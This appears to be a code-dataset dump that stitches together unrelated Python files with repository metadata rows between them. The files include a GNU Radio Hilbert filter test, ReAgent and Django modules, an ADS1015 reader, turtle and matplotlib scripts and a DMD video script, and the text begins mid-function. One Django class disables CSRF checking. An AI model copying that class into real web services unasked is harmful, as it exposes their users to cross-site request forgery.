    # Original used Python-2-only ``xrange`` and relied on ``map`` returning a
    # list; a comprehension gives the same eager list on both Python 2 and 3.
    return [math.sin(2. * math.pi * freq * float(i) / samp_rate) for i in range(N)]
def fir_filter(x, taps):
    """Reference FIR filter used to validate the Hilbert block.

    Args:
        x: real input samples (list of floats).
        taps: FIR coefficients.

    Returns:
        list[complex] where the real part is the group-delayed input and the
        imaginary part is the FIR output at each sample.
    """
    y = []
    # Zero-pad the front so the filter has len(taps)-1 samples of history.
    x2 = (len(taps) - 1) * [0, ] + list(x)
    # Group delay of a symmetric FIR. Must be integer division: under
    # Python 3 the original ``/ 2`` yields a float, which crashes when
    # used as a list index below.
    delay = (len(taps) - 1) // 2
    n_taps = len(taps)
    for i in range(len(x)):
        yi = 0
        for j in range(n_taps):
            # Convolution: taps are applied time-reversed.
            yi += taps[n_taps - 1 - j] * x2[i + j]
        y.append(complex(x2[i + delay], yi))
    return y
class test_hilbert(gr_unittest.TestCase):
    """QA test for GNU Radio's Hilbert transform block (filter.hilbert_fc)."""
    def setUp(self):
        # Fresh top-level flowgraph for each test case.
        self.tb = gr.top_block ()
    def tearDown(self):
        self.tb = None
    def test_hilbert(self):
        """Compare hilbert_fc output against a pure-Python FIR reference."""
        tb = self.tb
        ntaps = 51
        sampling_freq = 100
        # Enough samples to cover the filter transient plus 0.1 s of signal.
        N = int(ntaps + sampling_freq * 0.10)
        data = sig_source_f(sampling_freq, sampling_freq * 0.10, 1.0, N)
        src1 = blocks.vector_source_f(data)
        # Design the Hilbert taps once and compute the expected result in
        # Python with the same coefficients the block will use.
        taps = filter.firdes.hilbert(ntaps, filter.firdes.WIN_HAMMING)
        expected_result = fir_filter(data, taps)
        hilb = filter.hilbert_fc(ntaps)
        dst1 = blocks.vector_sink_c()
        # source -> hilbert -> sink
        tb.connect(src1, hilb)
        tb.connect(hilb, dst1)
        tb.run()
        dst_data = dst1.data()
        # 5 decimal places of agreement between block and reference.
        self.assertComplexTuplesAlmostEqual(expected_result, dst_data, 5)
if __name__ == '__main__':
gr_unittest.run(test_hilbert, "test_hilbert.xml")
| 1,066 | 20 | 150 |
a195a12bcbb2de73d5ba7db88a8a27392864dc58 | 1,539 | py | Python | reagent/net_builder/discrete_actor_net_builder.py | wall-ed-coder/ReAgent | 14d9906d74f943e74c6a6f95d129e18741168f9c | [
"BSD-3-Clause"
] | null | null | null | reagent/net_builder/discrete_actor_net_builder.py | wall-ed-coder/ReAgent | 14d9906d74f943e74c6a6f95d129e18741168f9c | [
"BSD-3-Clause"
] | null | null | null | reagent/net_builder/discrete_actor_net_builder.py | wall-ed-coder/ReAgent | 14d9906d74f943e74c6a6f95d129e18741168f9c | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
import abc
from typing import List
import torch
from reagent.core.fb_checker import IS_FB_ENVIRONMENT
from reagent.core.registry_meta import RegistryMeta
from reagent.models.base import ModelBase
from reagent.parameters import NormalizationData
from reagent.prediction.predictor_wrapper import ActorWithPreprocessor
from reagent.preprocessing.preprocessor import Preprocessor
if IS_FB_ENVIRONMENT:
from reagent.fb.prediction.fb_predictor_wrapper import (
FbActorPredictorWrapper as ActorPredictorWrapper,
)
else:
from reagent.prediction.predictor_wrapper import ActorPredictorWrapper
class DiscreteActorNetBuilder(metaclass=RegistryMeta):
"""
Base class for discrete actor net builder.
"""
@abc.abstractmethod
def build_serving_module(
self,
actor: ModelBase,
state_normalization_data: NormalizationData,
action_feature_ids: List[int],
) -> torch.nn.Module:
"""
Returns a TorchScript predictor module
"""
state_preprocessor = Preprocessor(
state_normalization_data.dense_normalization_parameters, use_gpu=False
)
actor_with_preprocessor = ActorWithPreprocessor(
actor.cpu_model().eval(),
state_preprocessor,
)
return ActorPredictorWrapper(actor_with_preprocessor, action_feature_ids)
| 28.5 | 82 | 0.725796 | #!/usr/bin/env python3
import abc
from typing import List
import torch
from reagent.core.fb_checker import IS_FB_ENVIRONMENT
from reagent.core.registry_meta import RegistryMeta
from reagent.models.base import ModelBase
from reagent.parameters import NormalizationData
from reagent.prediction.predictor_wrapper import ActorWithPreprocessor
from reagent.preprocessing.preprocessor import Preprocessor
if IS_FB_ENVIRONMENT:
from reagent.fb.prediction.fb_predictor_wrapper import (
FbActorPredictorWrapper as ActorPredictorWrapper,
)
else:
from reagent.prediction.predictor_wrapper import ActorPredictorWrapper
class DiscreteActorNetBuilder(metaclass=RegistryMeta):
    """
    Base class for discrete actor net builder.

    Subclasses register themselves via RegistryMeta and must implement
    build_actor(); build_serving_module() wraps the trained actor into a
    TorchScript-exportable predictor.
    """
    @abc.abstractmethod
    def build_actor(
        self,
        state_normalization_data: NormalizationData,
        num_actions: int,
    ) -> ModelBase:
        """Construct the actor network; implemented by registered subclasses."""
        pass
    def build_serving_module(
        self,
        actor: ModelBase,
        state_normalization_data: NormalizationData,
        action_feature_ids: List[int],
    ) -> torch.nn.Module:
        """
        Returns a TorchScript predictor module
        """
        # Preprocessor normalizes raw state features; serving runs on CPU.
        state_preprocessor = Preprocessor(
            state_normalization_data.dense_normalization_parameters, use_gpu=False
        )
        # Move the actor to CPU and switch to eval mode before wrapping.
        actor_with_preprocessor = ActorWithPreprocessor(
            actor.cpu_model().eval(),
            state_preprocessor,
        )
        return ActorPredictorWrapper(actor_with_preprocessor, action_feature_ids)
| 121 | 0 | 26 |
5af783943b8c376293c1b3b150c9dca00877a8eb | 668 | py | Python | 6 semester/Computer graphics/lab7.2.py | vladtsap/study | 87bc1aae4db67fdc18d5203f4e2af1dee1220ec5 | [
"MIT"
] | 1 | 2021-07-13T14:35:21.000Z | 2021-07-13T14:35:21.000Z | 6 semester/Computer graphics/lab7.2.py | vladtsap/study | 87bc1aae4db67fdc18d5203f4e2af1dee1220ec5 | [
"MIT"
] | null | null | null | 6 semester/Computer graphics/lab7.2.py | vladtsap/study | 87bc1aae4db67fdc18d5203f4e2af1dee1220ec5 | [
"MIT"
] | null | null | null | show_process = False
iterations = 50
import turtle
if not show_process:
turtle.tracer(0)
turtle.colormode(255)
turtle.color((0, 150, 0))
turtle.penup()
turtle.goto(-330, 0)
turtle.pendown()
fern(iterations)
turtle.update()
turtle.exitonclick()
| 17.128205 | 36 | 0.535928 | show_process = False
iterations = 50
import turtle
if not show_process:
turtle.tracer(0)
def fern(length):
    """Recursively draw a fern frond of the given *length* with turtle graphics."""
    # Base case: very short segments are drawn as a single out-and-back stroke.
    if length <= 0.50:
        turtle.fd(length)
        turtle.bk(length)
        return
    turtle.fd(length)
    # Left leaflet.
    turtle.lt(90)
    fern(length * 0.35)
    # Right leaflet: turn through 180 degrees relative to the left one.
    turtle.rt(180)
    fern(length * 0.35)
    turtle.lt(90)
    # Continue the slightly curved main stem, then retrace back to the start.
    turtle.lt(3)
    fern(length * 0.87)
    turtle.rt(3)
    turtle.bk(length)
turtle.colormode(255)
turtle.color((0, 150, 0))
turtle.penup()
turtle.goto(-330, 0)
turtle.pendown()
fern(iterations)
turtle.update()
turtle.exitonclick()
| 370 | 0 | 25 |
ba33f9c40a30d9716e2192d6b3a8e6d34446b9b5 | 282 | py | Python | crowdgezwitscher/crowdgezwitscher/auth.py | Strassengezwitscher/Crowdgezwitscher | afdd433acb35c1a554ba79464b744975de065151 | [
"MIT"
] | 4 | 2016-07-22T07:20:31.000Z | 2016-11-13T18:13:34.000Z | crowdgezwitscher/crowdgezwitscher/auth.py | Strassengezwitscher/Strassengezwitscher | afdd433acb35c1a554ba79464b744975de065151 | [
"MIT"
] | 402 | 2016-04-26T08:38:17.000Z | 2022-03-11T23:26:49.000Z | crowdgezwitscher/crowdgezwitscher/auth.py | Strassengezwitscher/Crowdgezwitscher | afdd433acb35c1a554ba79464b744975de065151 | [
"MIT"
] | 1 | 2018-01-14T16:58:57.000Z | 2018-01-14T16:58:57.000Z | # source: https://stackoverflow.com/a/30875830
from rest_framework.authentication import SessionAuthentication
| 31.333333 | 68 | 0.804965 | # source: https://stackoverflow.com/a/30875830
from rest_framework.authentication import SessionAuthentication
class CsrfExemptSessionAuthentication(SessionAuthentication):
    """DRF session authentication with the CSRF check disabled (see link above)."""
    def enforce_csrf(self, request):
        # Intentionally a no-op: overrides SessionAuthentication.enforce_csrf
        # so no CSRF validation is performed for these requests.
        return  # To not perform the csrf check previously happening
| 80 | 40 | 50 |
8e2e46cf37ae73b3ff79a8eddbcfb3b598dec0c0 | 51 | py | Python | nbmolviz/base/__init__.py | jparkhill/notebook-molecular-visualization | 2dd61fedcf363d7362b727669b86c5f1c07656fd | [
"Apache-2.0"
] | 55 | 2016-07-21T23:25:59.000Z | 2022-02-14T01:04:49.000Z | nbmolviz/base/__init__.py | jparkhill/notebook-molecular-visualization | 2dd61fedcf363d7362b727669b86c5f1c07656fd | [
"Apache-2.0"
] | 40 | 2016-07-26T20:57:04.000Z | 2021-09-06T02:31:52.000Z | nbmolviz/base/__init__.py | Autodesk/notebook-molecular-visualization | 2dd61fedcf363d7362b727669b86c5f1c07656fd | [
"Apache-2.0"
] | 18 | 2016-07-25T21:49:02.000Z | 2020-10-03T11:17:03.000Z | from .base_widget import *
from .mdt2json import *
| 17 | 26 | 0.764706 | from .base_widget import *
from .mdt2json import *
| 0 | 0 | 0 |
88ad5ef34c4f5e74c468301747172d1d70c18248 | 1,765 | py | Python | library/explorerhat/ads1015.py | DT-was-an-ET/explorer-hat | 9dd8624a094b9a7663fbcbb95be72fdb946eecc7 | [
"MIT"
] | null | null | null | library/explorerhat/ads1015.py | DT-was-an-ET/explorer-hat | 9dd8624a094b9a7663fbcbb95be72fdb946eecc7 | [
"MIT"
] | null | null | null | library/explorerhat/ads1015.py | DT-was-an-ET/explorer-hat | 9dd8624a094b9a7663fbcbb95be72fdb946eecc7 | [
"MIT"
] | null | null | null | import time
from sys import exit, version_info
try:
from smbus import SMBus
except ImportError:
if version_info[0] < 3:
exit("This library requires python-smbus\nInstall with: sudo apt-get install python-smbus")
elif version_info[0] == 3:
exit("This library requires python3-smbus\nInstall with: sudo apt-get install python3-smbus")
adc_available = True
address = 0x48
i2c = SMBus(i2c_bus_id())
REG_CONV = 0x00
REG_CFG = 0x01
samples_per_second_map = {128: 0x0000, 250: 0x0020, 490: 0x0040, 920: 0x0060, 1600: 0x0080, 2400: 0x00A0, 3300: 0x00C0}
channel_map = {0: 0x4000, 1: 0x5000, 2: 0x6000, 3: 0x7000}
programmable_gain_map = {6144: 0x0000, 4096: 0x0200, 2048: 0x0400, 1024: 0x0600, 512: 0x0800, 256: 0x0A00}
PGA_6_144V = 6144
PGA_4_096V = 4096
PGA_2_048V = 2048
PGA_1_024V = 1024
PGA_0_512V = 512
PGA_0_256V = 256
try:
read_se_adc()
except IOError:
adc_available = False
| 27.153846 | 119 | 0.692918 | import time
from sys import exit, version_info
try:
from smbus import SMBus
except ImportError:
if version_info[0] < 3:
exit("This library requires python-smbus\nInstall with: sudo apt-get install python-smbus")
elif version_info[0] == 3:
exit("This library requires python3-smbus\nInstall with: sudo apt-get install python3-smbus")
adc_available = True
def i2c_bus_id():
    """Return the Raspberry Pi I2C bus number (0 on early boards, 1 on rev >= 4)."""
    # Take the first "Revision" line from /proc/cpuinfo; fall back to '0000'
    # if none is found (same behaviour as the original one-liner).
    revision = '0000'
    for line in open('/proc/cpuinfo', 'r').readlines():
        if line[:8] == "Revision":
            revision = line[12:-1]
            break
    return 1 if int(revision, 16) >= 4 else 0
address = 0x48
i2c = SMBus(i2c_bus_id())
REG_CONV = 0x00
REG_CFG = 0x01
samples_per_second_map = {128: 0x0000, 250: 0x0020, 490: 0x0040, 920: 0x0060, 1600: 0x0080, 2400: 0x00A0, 3300: 0x00C0}
channel_map = {0: 0x4000, 1: 0x5000, 2: 0x6000, 3: 0x7000}
programmable_gain_map = {6144: 0x0000, 4096: 0x0200, 2048: 0x0400, 1024: 0x0600, 512: 0x0800, 256: 0x0A00}
PGA_6_144V = 6144
PGA_4_096V = 4096
PGA_2_048V = 2048
PGA_1_024V = 1024
PGA_0_512V = 512
PGA_0_256V = 256
def read_se_adc(channel=1, programmable_gain=PGA_6_144V, samples_per_second=1600):
    """Perform one single-shot, single-ended ADS1015 conversion and return volts.

    channel: input channel 0-3; programmable_gain: full-scale range in mV
    (one of the PGA_* constants); samples_per_second: ADC data rate.
    """
    # sane defaults
    # NOTE(review): presumably 0x0003 = comparator-disable and 0x0100 =
    # single-shot MODE bit — confirm against the ADS1015 config register map.
    config = 0x0003 | 0x0100
    config |= samples_per_second_map[samples_per_second]
    config |= channel_map[channel]
    config |= programmable_gain_map[programmable_gain]
    # set "single shot" mode
    config |= 0x8000
    # write single conversion flag
    i2c.write_i2c_block_data(address, REG_CFG, [(config >> 8) & 0xFF, config & 0xFF])
    # Wait one sample period (plus a small margin) for the conversion to finish.
    delay = (1.0 / samples_per_second) + 0.0001
    time.sleep(delay)
    data = i2c.read_i2c_block_data(address, REG_CONV)
    # 12-bit result is left-aligned in the two bytes (hence >> 4); scale by
    # the PGA full-scale range (mV) and convert to volts.
    return (((data[0] << 8) | data[1]) >> 4) * programmable_gain / 2048.0 / 1000.0
try:
read_se_adc()
except IOError:
adc_available = False
| 796 | 0 | 46 |
7c12abd47a52ad7e02410a984ccfe624d0b9deeb | 230 | py | Python | pyvolt/types/category.py | Gael-devv/Pyvolt | 1d84ba95f1fd3f959a933051c25f8a3e60500c5d | [
"MIT"
] | null | null | null | pyvolt/types/category.py | Gael-devv/Pyvolt | 1d84ba95f1fd3f959a933051c25f8a3e60500c5d | [
"MIT"
] | null | null | null | pyvolt/types/category.py | Gael-devv/Pyvolt | 1d84ba95f1fd3f959a933051c25f8a3e60500c5d | [
"MIT"
] | null | null | null | from typing import TYPE_CHECKING, TypedDict
if TYPE_CHECKING:
from .snowflake import Snowflake, SnowflakeList
__all__ = ("Category",)
| 17.692308 | 51 | 0.743478 | from typing import TYPE_CHECKING, TypedDict
if TYPE_CHECKING:
from .snowflake import Snowflake, SnowflakeList
__all__ = ("Category",)
class Category(TypedDict):
    """Typed payload for a channel category: its id, title and member channel ids."""
    id: Snowflake
    title: str
    channels: SnowflakeList
| 0 | 66 | 23 |
7076ef271d06a797450c907543f266df5539f478 | 841 | py | Python | test/digits_1112.py | Radenz/my-convex-hull | e887d84dd646ae046b10633218d0bf9b266fb8f6 | [
"MIT"
] | null | null | null | test/digits_1112.py | Radenz/my-convex-hull | e887d84dd646ae046b10633218d0bf9b266fb8f6 | [
"MIT"
] | null | null | null | test/digits_1112.py | Radenz/my-convex-hull | e887d84dd646ae046b10633218d0bf9b266fb8f6 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import datasets
from myConvexHull import convex_hull, random_color
from myConvexHull.point_utils import X, Y
data = datasets.load_digits()
df = pd.DataFrame(data.data, columns=data.feature_names)
df['Target'] = pd.DataFrame(data.target)
plt.figure(figsize=(10, 6))
plt.title('Pixel [1, 3] vs Pixel [1, 4]')
plt.xlabel(data.feature_names[11])
plt.ylabel(data.feature_names[12])
for i in range(len(data.target_names)):
bucket = df[df['Target'] == i]
bucket = bucket.iloc[:, [11, 12]].values
hull = convex_hull(bucket)
color = random_color()
plt.scatter(bucket[:, 0], bucket[:, 1],
label=data.target_names[i], color=color)
hull = np.transpose(hull)
plt.plot(hull[X], hull[Y], color=color)
plt.legend()
plt.show()
| 30.035714 | 56 | 0.699168 | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import datasets
from myConvexHull import convex_hull, random_color
from myConvexHull.point_utils import X, Y
data = datasets.load_digits()
df = pd.DataFrame(data.data, columns=data.feature_names)
df['Target'] = pd.DataFrame(data.target)
plt.figure(figsize=(10, 6))
plt.title('Pixel [1, 3] vs Pixel [1, 4]')
plt.xlabel(data.feature_names[11])
plt.ylabel(data.feature_names[12])
for i in range(len(data.target_names)):
bucket = df[df['Target'] == i]
bucket = bucket.iloc[:, [11, 12]].values
hull = convex_hull(bucket)
color = random_color()
plt.scatter(bucket[:, 0], bucket[:, 1],
label=data.target_names[i], color=color)
hull = np.transpose(hull)
plt.plot(hull[X], hull[Y], color=color)
plt.legend()
plt.show()
| 0 | 0 | 0 |
89a1617fe951435594bb047f64e8489024798ba7 | 497 | py | Python | World 1/Modules/ex020 - Choosing a Order.py | MiguelChichorro/PythonExercises | 3b2726e7d9ef92c1eb6b977088692c42a2a7b86e | [
"MIT"
] | 2 | 2021-04-23T19:18:06.000Z | 2021-05-15T17:45:21.000Z | World 1/Modules/ex020 - Choosing a Order.py | MiguelChichorro/PythonExercises | 3b2726e7d9ef92c1eb6b977088692c42a2a7b86e | [
"MIT"
] | 1 | 2021-05-14T00:29:23.000Z | 2021-05-14T00:29:23.000Z | World 1/Modules/ex020 - Choosing a Order.py | MiguelChichorro/PythonExercises | 3b2726e7d9ef92c1eb6b977088692c42a2a7b86e | [
"MIT"
] | 1 | 2021-05-14T00:19:33.000Z | 2021-05-14T00:19:33.000Z | from random import sample
from time import sleep
colors = {"clean": "\033[m",
"red": "\033[31m",
"green": "\033[32m",
"yellow": "\033[33m",
"blue": "\033[34m",
"purple": "\033[35m",
"cian": "\033[36m"}
order = ["Breno", "Edu", "Miguel", "Lucas"]
print("{}Hmm...let me see{}".format(colors["cian"], colors["clean"]))
sleep(2)
print("The presentation order is {}{}{} "
.format(colors["yellow"], sample(order, k=4), colors["clean"]))
| 33.133333 | 69 | 0.527163 | from random import sample
from time import sleep
colors = {"clean": "\033[m",
"red": "\033[31m",
"green": "\033[32m",
"yellow": "\033[33m",
"blue": "\033[34m",
"purple": "\033[35m",
"cian": "\033[36m"}
order = ["Breno", "Edu", "Miguel", "Lucas"]
print("{}Hmm...let me see{}".format(colors["cian"], colors["clean"]))
sleep(2)
print("The presentation order is {}{}{} "
.format(colors["yellow"], sample(order, k=4), colors["clean"]))
| 0 | 0 | 0 |
d96784146bd766dcccea9ce0e829666670d8dddd | 2,689 | py | Python | video_background_dynamic_mode_decomposition_582HW5/subtractLRvideo.py | aruymgaart/AMATH | 87579a076ec74094d0420c2a1f477022aaefb6bc | [
"MIT"
] | null | null | null | video_background_dynamic_mode_decomposition_582HW5/subtractLRvideo.py | aruymgaart/AMATH | 87579a076ec74094d0420c2a1f477022aaefb6bc | [
"MIT"
] | null | null | null | video_background_dynamic_mode_decomposition_582HW5/subtractLRvideo.py | aruymgaart/AMATH | 87579a076ec74094d0420c2a1f477022aaefb6bc | [
"MIT"
] | null | null | null | # AP Ruymgaart DMD, main script
import numpy as np, time, sys, copy, matplotlib.pyplot as plt
from videoFunctions import *
from tensorFiles import *
from plottingFunctions import *
from dmd import *
#==== input (command line, from run.sh) ====
print('===================================== start DMD =================================\nInput:')
cmds = processCmdArgs(sys.argv)
for c in cmds: print('\t', c, cmds[c])
dt,nv,fname,ftype,images,f0,f1,outname,frPlot,binv = None,None,None,None,None,None,None,None,[],None
try:
nv = int(cmds['modes'])
dt,thresh = float(cmds['dt']), float(cmds['thresh'])
fname,ftype,outname = cmds['movie'], cmds['type'], cmds['outname']
f0,f1 = int(cmds['framestart']), int(cmds['framestop'])
szplotfr = cmds['plotframes'].split(',')
binv = cmds['inv'].lower() == 'true'
for h in szplotfr: frPlot.append(int(h))
except: print('** input error **'), exit()
if ftype == 'npz': images = tnsrFile2numpy(fname)
else: images = video2numpy(fname)
print('Movie-shape=', images.shape, 'dt=',dt, 'Nr modes=', nv, 'file-type=', ftype, 'frame', f0, 'to', f1)
print('Plot frames', frPlot, 'output file name', outname)
#==== DMD & dmdDynamics ====
X, szX, szY = flattenVideo(images, f0, f1)
[Phi,A,S,L,X1,X2,b] = DMD(X, szY, szX, nv)
Xdmd, T, omega = dmdDynamics(X1,L,b,Phi,nv,dt=dt)
#==== foreground/background ====
BG = abs(copy.copy(Xdmd.T))
FG = X[0:len(X)-1] - BG + 0.3 #- subtract low rank BG and add a grey background
print(np.min(FG), np.max(FG))
if False:
R = copy.copy(FG)
R[R > 0] = 0.0
FG = FG - R
BG = BG + R
for n in range(len(FG)): FG[n] = FG[n]/np.max(FG[n])
FG[FG < thresh] = 0.0 # thresholding (see paper)
if False: #- alternative attempt to select modes, not used now
omegaCut = 0.0
Xlr,Xhr = np.zeros(Xdmd.shape), np.zeros(Xdmd.shape)
for k in range(T.shape[1]):
LRt, HRt = dmdDynamicsLrVec(X1, L, b, Phi, k, dt, omegaCut=omegaCut)
Xlr[:,k] = LRt
Xhr[:,k] = HRt
L2 = np.abs(Xlr.T)
H2 = np.abs(Xhr.T)
lrMv = reshape2video(L2/np.max(L2), szY, szX)
np2movieFile(lrMv, outname+'_xlr', invert=binv)
hrMv = reshape2video(H2/np.max(H2), szY, szX)
np2movieFile(hrMv, outname+'_xhr', invert=binv)
#==== output ====
plotSV(np.log(np.abs(S) + 1), fname=outname+'_logSV.png')
plotSV(np.abs(omega), fname=outname+'_omega.png')
bgMv = reshape2video(BG, szY, szX)
bgMv = bgMv/np.max(bgMv)
np2movieFile(bgMv, outname+'_LR', invert=binv)
fgMv = reshape2video(FG, szY, szX)
np2movieFile(fgMv, outname+'_diff', invert=binv)
origMv = reshape2video(X[0:len(X)-1], szY, szX)
for fr in frPlot:
plotFrame(bgMv, fr, outname+'_LR_%d' % (fr))
plotFrame(fgMv, fr, outname+'_diff_%d' % (fr))
plotFrame(origMv, fr, outname+'_orig_%d' % (fr)) | 36.337838 | 106 | 0.641502 | # AP Ruymgaart DMD, main script
import numpy as np, time, sys, copy, matplotlib.pyplot as plt
from videoFunctions import *
from tensorFiles import *
from plottingFunctions import *
from dmd import *
#==== input (command line, from run.sh) ====
print('===================================== start DMD =================================\nInput:')
cmds = processCmdArgs(sys.argv)
for c in cmds: print('\t', c, cmds[c])
dt,nv,fname,ftype,images,f0,f1,outname,frPlot,binv = None,None,None,None,None,None,None,None,[],None
try:
nv = int(cmds['modes'])
dt,thresh = float(cmds['dt']), float(cmds['thresh'])
fname,ftype,outname = cmds['movie'], cmds['type'], cmds['outname']
f0,f1 = int(cmds['framestart']), int(cmds['framestop'])
szplotfr = cmds['plotframes'].split(',')
binv = cmds['inv'].lower() == 'true'
for h in szplotfr: frPlot.append(int(h))
except: print('** input error **'), exit()
if ftype == 'npz': images = tnsrFile2numpy(fname)
else: images = video2numpy(fname)
print('Movie-shape=', images.shape, 'dt=',dt, 'Nr modes=', nv, 'file-type=', ftype, 'frame', f0, 'to', f1)
print('Plot frames', frPlot, 'output file name', outname)
#==== DMD & dmdDynamics ====
X, szX, szY = flattenVideo(images, f0, f1)
[Phi,A,S,L,X1,X2,b] = DMD(X, szY, szX, nv)
Xdmd, T, omega = dmdDynamics(X1,L,b,Phi,nv,dt=dt)
#==== foreground/background ====
BG = abs(copy.copy(Xdmd.T))
FG = X[0:len(X)-1] - BG + 0.3 #- subtract low rank BG and add a grey background
print(np.min(FG), np.max(FG))
if False:
R = copy.copy(FG)
R[R > 0] = 0.0
FG = FG - R
BG = BG + R
for n in range(len(FG)): FG[n] = FG[n]/np.max(FG[n])
FG[FG < thresh] = 0.0 # thresholding (see paper)
if False: #- alternative attempt to select modes, not used now
omegaCut = 0.0
Xlr,Xhr = np.zeros(Xdmd.shape), np.zeros(Xdmd.shape)
for k in range(T.shape[1]):
LRt, HRt = dmdDynamicsLrVec(X1, L, b, Phi, k, dt, omegaCut=omegaCut)
Xlr[:,k] = LRt
Xhr[:,k] = HRt
L2 = np.abs(Xlr.T)
H2 = np.abs(Xhr.T)
lrMv = reshape2video(L2/np.max(L2), szY, szX)
np2movieFile(lrMv, outname+'_xlr', invert=binv)
hrMv = reshape2video(H2/np.max(H2), szY, szX)
np2movieFile(hrMv, outname+'_xhr', invert=binv)
#==== output ====
plotSV(np.log(np.abs(S) + 1), fname=outname+'_logSV.png')
plotSV(np.abs(omega), fname=outname+'_omega.png')
bgMv = reshape2video(BG, szY, szX)
bgMv = bgMv/np.max(bgMv)
np2movieFile(bgMv, outname+'_LR', invert=binv)
fgMv = reshape2video(FG, szY, szX)
np2movieFile(fgMv, outname+'_diff', invert=binv)
origMv = reshape2video(X[0:len(X)-1], szY, szX)
for fr in frPlot:
plotFrame(bgMv, fr, outname+'_LR_%d' % (fr))
plotFrame(fgMv, fr, outname+'_diff_%d' % (fr))
plotFrame(origMv, fr, outname+'_orig_%d' % (fr)) | 0 | 0 | 0 |
483599ed8536eddf29b6ea87ea65105e1967fb97 | 2,479 | py | Python | payment_rounding/settings.py | adrian-kalinin/payment-rounding-api | d4639a2e7e733a40dccc3fe98605352c594b4332 | [
"MIT"
] | null | null | null | payment_rounding/settings.py | adrian-kalinin/payment-rounding-api | d4639a2e7e733a40dccc3fe98605352c594b4332 | [
"MIT"
] | null | null | null | payment_rounding/settings.py | adrian-kalinin/payment-rounding-api | d4639a2e7e733a40dccc3fe98605352c594b4332 | [
"MIT"
] | null | null | null | from pathlib import Path
import environ
env = environ.Env()
READ_DOT_ENV_FILE = env.bool('READ_DOT_ENV_FILE', default=True)
if READ_DOT_ENV_FILE:
env.read_env()
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = env('SECRET_KEY')
DEBUG = env.bool('DEBUG')
ALLOWED_HOSTS = ['127.0.0.1', 'payment-rounding.adrian-kalinin.dev', 'payment-rounding-api-5x85t.ondigitalocean.app']
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'api',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'payment_rounding.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'payment_rounding.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
)
}
| 22.536364 | 117 | 0.673255 | from pathlib import Path
import environ
# django-environ reader used for all environment-driven settings below.
env = environ.Env()
# Optionally load a .env file; defaults to on, can be disabled where the
# hosting platform injects variables directly.
READ_DOT_ENV_FILE = env.bool('READ_DOT_ENV_FILE', default=True)
if READ_DOT_ENV_FILE:
    env.read_env()
# Project root: two directories above this settings module.
BASE_DIR = Path(__file__).resolve().parent.parent
# Secret key and debug flag come from the environment (django-environ), so
# no secrets are committed to the repository.
SECRET_KEY = env('SECRET_KEY')
DEBUG = env.bool('DEBUG')
# Hosts this app may serve: local dev plus the two production domains.
ALLOWED_HOSTS = ['127.0.0.1', 'payment-rounding.adrian-kalinin.dev', 'payment-rounding-api-5x85t.ondigitalocean.app']
# Django contrib apps, Django REST Framework, and the project's `api` app.
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    'api',
]
# Standard Django middleware stack; order is significant.
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'payment_rounding.urls'
# Default Django template engine; app template dirs only (DIRS is empty).
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'payment_rounding.wsgi.application'
# SQLite file database stored next to the project root.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
# Django's stock password strength validators.
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization / time-zone settings.
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
